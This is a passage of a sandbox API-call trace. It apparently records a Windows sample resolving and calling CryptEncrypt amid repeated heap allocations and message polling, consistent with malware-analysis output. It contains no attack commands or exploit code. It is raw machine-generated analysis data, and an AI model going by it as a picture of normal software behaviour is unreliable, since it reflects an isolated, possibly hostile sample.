lpMsg=0x8cf158) returned 0 [0251.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0251.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0251.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0251.313] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0251.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0251.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0251.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0251.388] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0251.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0251.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0251.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0251.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0251.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0251.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0251.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0251.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0251.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0251.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0251.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0251.388] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0251.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0251.388] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0251.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55dc0 [0251.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0251.389] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0251.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55dc0 | out: hHeap=0x970000) returned 1 [0251.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51688 [0251.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0251.389] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0251.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0251.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0251.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0251.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.389] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0251.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0251.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0251.389] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0251.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0251.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0251.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0251.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0251.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0251.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0251.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0251.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0251.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0251.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0251.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0251.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0251.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0251.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0251.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0251.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0251.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0251.390] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0251.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0251.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.391] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0251.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0251.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0251.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0251.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0251.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0251.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0251.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0251.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0251.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0251.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0251.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0251.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0251.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0251.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0251.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0251.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0251.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0251.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0251.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0251.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0251.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0251.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0251.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0251.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0251.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0251.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0251.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0251.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11ef3) returned 0x2e7f320 [0251.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0251.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0251.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0251.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0251.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0251.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0251.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0251.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0251.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0251.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e558d8 [0251.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0251.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0251.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0251.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0251.398] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0251.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0251.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0251.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0251.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0251.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0251.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0251.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0251.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0251.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0251.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0251.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0251.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0251.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0251.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0251.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0251.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0251.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0251.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0251.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0251.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0251.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0251.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0251.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0251.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0251.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0251.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0251.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0251.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0251.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0251.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0251.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0251.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0251.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0251.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0251.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0251.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0251.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0251.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0251.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0251.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0251.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0251.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0251.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0251.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0251.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0251.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0251.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0251.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0251.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0251.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0251.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0251.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0251.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0251.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0251.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0251.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0251.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0251.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0251.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0251.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0251.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0251.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0251.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0251.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0251.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0251.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51b68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0251.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0251.402] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0251.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0251.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.402] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x11ef3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x11ef8) returned 1 [0251.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0251.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 